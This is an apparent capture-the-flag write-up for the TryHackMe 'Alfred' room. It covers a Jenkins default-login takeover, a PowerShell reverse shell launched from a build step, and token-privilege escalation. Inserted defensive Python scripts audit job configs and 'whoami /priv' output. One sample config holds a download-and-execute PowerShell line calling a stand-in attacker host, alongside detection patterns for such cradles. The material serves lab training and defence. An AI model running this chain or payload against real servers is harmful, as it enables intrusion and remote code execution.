Alfred

https://tryhackme.com/room/alfred

User flag

Let's start with an nmap scan:

We see there are three open ports (80, 3389, 8080).

If we head to port 80 we'll find the following:

After a little enumeration on port 80 we found nothing really interesting, so let's check port 8080.

We see a Jenkins login page. We could try to brute-force it, but first let's try common/default credentials like admin:admin.

It works! Now if we look around we can get a reverse shell by configuring one of the existing projects: http://10.10.173.2:8080/job/project/1/configure

First we need to host a web server so the victim can download a PowerShell script that gives us a reverse shell (the script: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1).

Then enter the following code in the description:

Save and apply, then select "Build now" (don't forget to start a listener first).
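From the defender's side, the step above leaves a trace in the job's config.xml: a build step whose command runs PowerShell and pulls a script from a web server. The following is an added example, not code from the original writeup or from Jenkins, that audits a freestyle job's config.xml for that pattern. The indicator list and the sample XML are constructed for this example; the `<builders>`/`<command>` layout matches what Jenkins stores for a freestyle job.

```python
"""Audit a Jenkins freestyle job config.xml for download-and-execute build steps."""
import re
import xml.etree.ElementTree as ET

# Indicators of a PowerShell step that fetches remote code and runs it
# (constructed watchlist for this example; extend it for your environment).
INDICATORS = {
    "powershell": re.compile(r"powershell(\.exe)?", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(r"downloadstring|webclient|invoke-webrequest|\biwr\b", re.I),
    "known_shell_script": re.compile(r"invoke-powershelltcp", re.I),
}


def audit_job_config(xml_text):
    """Return [(step_tag, matched_indicator_names)] for each suspicious build step.

    A step is reported when it invokes PowerShell and at least one further
    indicator (remote URL, inline execution, download cradle, known script) hits.
    """
    root = ET.fromstring(xml_text)
    findings = []
    # Freestyle jobs keep build steps under <builders>; batch/shell steps
    # (e.g. hudson.tasks.BatchFile) carry their script in a <command> child.
    for step in root.findall("./builders/*"):
        command = step.findtext("command") or ""
        hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
        if "powershell" in hits and len(hits) > 1:
            findings.append((step.tag, hits))
    return findings


def audit_job_config_file(path):
    """Convenience wrapper for a config.xml on disk ($JENKINS_HOME/jobs/<job>/config.xml)."""
    with open(path, encoding="utf-8") as fh:
        return audit_job_config(fh.read())


# Constructed sample: one harmless step and one matching the reverse-shell pattern.
SAMPLE_CONFIG = """<project>
  <description>test job</description>
  <builders>
    <hudson.tasks.BatchFile>
      <command>echo building...</command>
    </hudson.tasks.BatchFile>
    <hudson.tasks.BatchFile>
      <command>powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-HOST/Invoke-PowerShellTcp.ps1')"</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>
"""

if __name__ == "__main__":
    for tag, hits in audit_job_config(SAMPLE_CONFIG):
        print(f"suspicious build step <{tag}>: {', '.join(hits)}")
```

Run it over every `jobs/*/config.xml` under JENKINS_HOME, or wire it into a config-change hook: anyone who can edit a job can run commands as the Jenkins service account, so the real fix is restricting job configuration rights and the account's privileges, with this check as a detective control.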

Bingo. We got a shell.

Grab the flag.

Root flag

Now we have to find a way to gain root access. Let's start by checking our privileges.

We see that SeDebugPrivilege and SeImpersonatePrivilege are enabled. We can use incognito to exploit them. Since we're not using Metasploit we have to download it ourselves (https://github.com/milkdevil/incognito2).
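The privilege check above is the same one an administrator should run against the Jenkins service account: a build agent that holds SeImpersonatePrivilege or SeDebugPrivilege is one command away from SYSTEM. The following is an added example, not code from the original writeup, that parses the text `whoami /priv` prints and reports which high-risk privileges are enabled. The sample output and the watchlist of risky privileges are constructed for this example.

```python
"""Parse `whoami /priv` output and flag enabled privileges that enable token abuse."""

# Privileges that let a process obtain another account's token, read other
# processes' memory or otherwise reach SYSTEM (assumption: watchlist is mine).
HIGH_RISK = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege",
}


def parse_whoami_priv(text):
    """Return {privilege_name: (description, state)} from `whoami /priv` text.

    The table is located by its row of '=' separators; names and states never
    contain spaces, so the description is everything between the two.
    """
    lines = text.splitlines()
    try:
        sep_idx = next(i for i, line in enumerate(lines) if line.startswith("="))
    except StopIteration:
        raise ValueError("no privilege table found in input")
    privs = {}
    for line in lines[sep_idx + 1:]:
        parts = line.split()
        if len(parts) < 2:
            continue  # blank or truncated line
        name, state = parts[0], parts[-1]
        description = " ".join(parts[1:-1])
        privs[name] = (description, state)
    return privs


def risky_enabled(text):
    """Sorted names of HIGH_RISK privileges whose state is Enabled."""
    privs = parse_whoami_priv(text)
    return sorted(name for name, (_, state) in privs.items()
                  if name in HIGH_RISK and state == "Enabled")


# Constructed sample mirroring the layout `whoami /priv` prints.
SAMPLE_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeDebugPrivilege              Debug programs                            Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    for name in risky_enabled(SAMPLE_OUTPUT):
        print(f"{name} is enabled: this account can be used to obtain a SYSTEM token")
```

On a real host, run `whoami /priv` from a throwaway build job (or `runas` as the service account) and feed the output in; an empty result is what a properly restricted Jenkins account looks like.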

We can use certutil.exe to transfer the binary to the victim machine.

Now we have two options: impersonate the NT AUTHORITY\SYSTEM token, or create a new user with admin rights.

Let's try the first method:

When we attempt to impersonate the admin token we see there is no option available (maybe because we are not using a Meterpreter shell):

So let's try the second method:

Now we can log in over RDP using a remote desktop tool like rdesktop or Remmina.

Grab the flag.
